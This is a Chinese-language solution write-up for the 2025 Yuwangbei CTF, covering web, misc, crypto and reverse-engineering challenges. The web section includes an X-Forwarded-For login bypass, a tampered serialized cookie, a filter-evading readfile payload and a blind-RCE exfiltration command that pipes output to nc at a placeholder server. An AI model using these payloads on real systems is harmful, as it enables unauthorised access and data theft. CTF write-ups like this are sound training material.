2025御网杯CTF全解教学文档<\/h1>

Web安全部分<\/h2>

YWB_Web_xff<\/h3>

解题步骤：<\/strong><\/p>

查看网页源码，发现需要修改IP进行登录<\/li>
使用浏览器插件(如ModHeader)修改X-Forwarded-For头<\/li>
随意输入登录凭据即可通过验证<\/li> <\/ol>
技术要点：<\/strong><\/p>

X-Forwarded-For (XFF) HTTP头通常用于识别客户端原始IP<\/li>
服务器信任了可被用户控制的HTTP头导致认证绕过<\/li> <\/ul>
YWB_Web_未授权访问<\/h3>
解题步骤：<\/strong><\/p>

抓包分析请求，发现Cookie存在问题<\/li>
对Cookie进行URL解码，发现是序列化数据<\/li>
观察序列化数据最后一位是0，修改为1实现越权访问<\/li> <\/ol>
序列化数据格式示例：<\/strong><\/p>
a:2:{s:8:"username";s:5:"admin";s:6:"status";i:0;} <\/code><\/pre> 修改为：<\/p> a:2:{s:8:"username";s:5:"admin";s:6:"status";i:1;} <\/code><\/pre> 技术要点：<\/strong><\/p> PHP反序列化漏洞<\/li> 通过修改序列化数据中的权限标志实现权限提升<\/li> <\/ul> easyweb (无回显RCE)<\/h3> 解题步骤：<\/strong><\/p> 代码审计发现需要POST传参cmd<\/li> 发现回显被注释，属于无回显RCE<\/li> 使用curl进行数据外带： curl http:\/\/target.com --data "cmd=whoami | nc your_server_ip 4444" <\/code><\/pre> <\/li> 在公网服务器使用nc监听获取结果<\/li> <\/ol> 技术要点：<\/strong><\/p> 无回显命令执行利用技巧<\/li> 数据外带技术(DNS\/HTTP\/ICMP等)<\/li> 公网服务器作为中继点<\/li> <\/ul> YWB_Web_命令执行过滤绕过<\/h3> 解题步骤：<\/strong><\/p> 源码审计发现多重过滤<\/li> 传入参数必须包含"flag"<\/li> 在网页源码注释中发现线索<\/li> 使用readfile函数读取\/tmp\/flag.nisp<\/li> <\/ol> Payload分析：<\/strong><\/p> $_(%<\/span>27<\/span>\/<\/span>tmp<\/span>\/<\/span>flag<\/span>.<\/span>nisp<\/span>%<\/span>27<\/span>) <\/span><\/span><\/code><\/pre>其中：<\/p> chr()<\/code>将ASCII码转换为字符串<\/li> 使用点(.)拼接字符串<\/li> $_<\/code>变量赋值为"readfile"<\/li> 最终等效于readfile('\/tmp\/flag.nisp')<\/code><\/li> <\/ul> 技术要点：<\/strong><\/p> 字符串构造技巧绕过过滤<\/li> 变量动态函数调用<\/li> 文件路径猜测<\/li> <\/ul> YWB_Web_反序列化<\/h3> 解题步骤：<\/strong><\/p> 源码审计发现反序列化入口点<\/li> 抓包分析发现存在序列化参数点<\/li> 构造恶意序列化数据实现攻击<\/li> <\/ol> 技术要点：<\/strong><\/p> PHP反序列化漏洞利用<\/li> 魔术方法(__wakeup, __destruct等)的利用<\/li> POP链构造<\/li> <\/ul> 杂项(Misc)部分<\/h2> ez_xor<\/h3> 解题步骤：<\/strong><\/p> 分析附件内容<\/li> 识别出是XOR加密<\/li> 使用0x39作为密钥进行异或解密<\/li> <\/ol> 技术要点：<\/strong><\/p> XOR加密原理<\/li> 密钥识别与破解<\/li> <\/ul> 光隙中的寄生密钥<\/h3> 解题步骤：<\/strong><\/p> 分析图片附件<\/li> 使用binwalk分离出加密文档<\/li> 使用ARCHPR进行爆破<\/li> 对得到的密文先hex解码再base64解码<\/li> <\/ol> 技术要点：<\/strong><\/p> 文件隐写分析<\/li> 密码爆破工具使用<\/li> 编码转换技巧<\/li> <\/ul> 被折叠的显影图纸<\/h3> 解题步骤：<\/strong><\/p> 直接使用自动化工具处理<\/li> 可能需要多次解码或转换<\/li> <\/ol> ez_picture<\/h3> 解题步骤：<\/strong><\/p> 分析图片RGB通道异常<\/li> 发现随波逐流图片特性<\/li> 提取出加密压缩包<\/li> 解密得到图片，再次分析发现base64编码<\/li> 解码后发现PK头(ZIP文件特征)<\/li> 修改文件扩展名为zip并解压<\/li> 重复上述过程最终获取flag<\/li> <\/ol> 技术要点：<\/strong><\/p> 图片隐写分析<\/li> 文件格式识别<\/li> 多层编码\/加密处理<\/li> <\/ul> easy_misc<\/h3> 解题步骤：<\/strong><\/p> 编写脚本处理文件内容<\/li> 将ASCII码转换为字符<\/li> 得到base64编码结果<\/li> 先进行base58解码<\/li> 再进行凯撒解密<\/li> <\/ol> 技术要点：<\/strong><\/p> 编码转换<\/li> 古典密码分析<\/li> <\/ul> 密码学(Crypto)部分<\/h2> easy-签到题<\/h3> 解题步骤：<\/strong><\/p> 分析exe文件<\/li> 读取hex数据<\/li> 使用密码学工具箱直接解密<\/li> <\/ol> cry_rsa<\/h3> 解题步骤：<\/strong><\/p> 分析RSA题目附件<\/li> 编写解密脚本： from<\/span> Crypto.Util.number import<\/span> *<\/span> <\/span><\/span># 提供n, e, c等参数<\/span> <\/span><\/span># 进行RSA解密操作<\/span> <\/span><\/span><\/code><\/pre><\/li> 直接计算得到flag<\/li> <\/ol> 技术要点：<\/strong><\/p> RSA算法原理<\/li> 大数分解<\/li> 模运算<\/li> <\/ul> gift<\/h3> 解题步骤：<\/strong><\/p> 分析附件内容<\/li> 根据题目提示("披萨")联想到"pie"(饼)<\/li> 尝试pie作为密钥解密<\/li> 得到flag{zso}<\/li> <\/ol> 技术要点：<\/strong><\/p> 密码学中的语义提示<\/li> 密钥猜测技巧<\/li> <\/ul> 草甸方阵的密语<\/h3> 解题步骤：<\/strong><\/p> 根据提示使用栅栏密码+凯撒密码<\/li> 随波逐流读取exe文件<\/li> 栅栏解密(7栏)<\/li> 凯撒解密<\/li> <\/ol> 技术要点：<\/strong><\/p> 栅栏密码原理<\/li> 凯撒密码破解<\/li> 组合密码分析<\/li> <\/ul> ez_base<\/h3> 解题步骤：<\/strong><\/p> 识别为垃圾邮件编码<\/li> 使用spammimic网站解码器处理<\/li> 得到字符串后进行base64解码<\/li> <\/ol> 技术要点：<\/strong><\/p> 特殊编码识别<\/li> 在线工具辅助分析<\/li> <\/ul> baby_rsa<\/h3> 解题步骤：<\/strong><\/p> 分析txt附件内容<\/li> 识别exe的hex数据实为python脚本<\/li> 修改文件后缀为.py<\/li> 编写解密脚本： # 提供RSA参数<\/span> <\/span><\/span># 实现解密逻辑<\/span> <\/span><\/span><\/code><\/pre><\/li> 将结果中的4改为5提交<\/li> <\/ol> 技术要点：<\/strong><\/p> 文件格式识别<\/li> RSA算法实现<\/li> Python脚本分析<\/li> <\/ul> 逆向工程(Re)部分<\/h2> sign in<\/h3> 解题步骤：<\/strong><\/p> 使用strings查看文件，发现UPX壳<\/li> 使用upx -d脱壳<\/li> IDA打开脱壳后文件，F5查看伪代码<\/li> 分析发现RC4加密方法<\/li> 定位rc4_crypt加密函数<\/li> 分析callme函数的加密逻辑，提取密钥和字符串<\/li> 编写解密脚本<\/li> <\/ol> 技术要点：<\/strong><\/p> 加壳识别与脱壳<\/li> 静态分析工具使用<\/li> RC4算法分析<\/li> 密钥提取与解密脚本编写<\/li> <\/ul> 综合技巧总结<\/h2> Web安全：<\/strong><\/p> 始终检查源码和注释<\/li> 关注HTTP头操作(XFF, Cookie等)<\/li> 序列化\/反序列化漏洞利用<\/li> 命令执行过滤绕过技巧<\/li> <\/ul> <\/li> Misc：<\/strong><\/p> 文件分析三板斧：binwalk, strings, hexdump<\/li> 多层编码\/加密识别<\/li> 自动化脚本处理<\/li> <\/ul> <\/li> Crypto：<\/strong><\/p> 识别密码类型(对称\/非对称\/古典)<\/li> 利用现有工具加速解密<\/li> 注意题目中的语义提示<\/li> <\/ul> <\/li> Reverse：<\/strong><\/p> 加壳识别与处理<\/li> 静态分析结合动态调试<\/li> 加密算法识别与逆向<\/li> <\/ul> <\/li> <\/ol> 通过以上详细分析和解题步骤，参赛者可以全面掌握2025御网杯CTF中的各类题型和解题技巧。<\/p>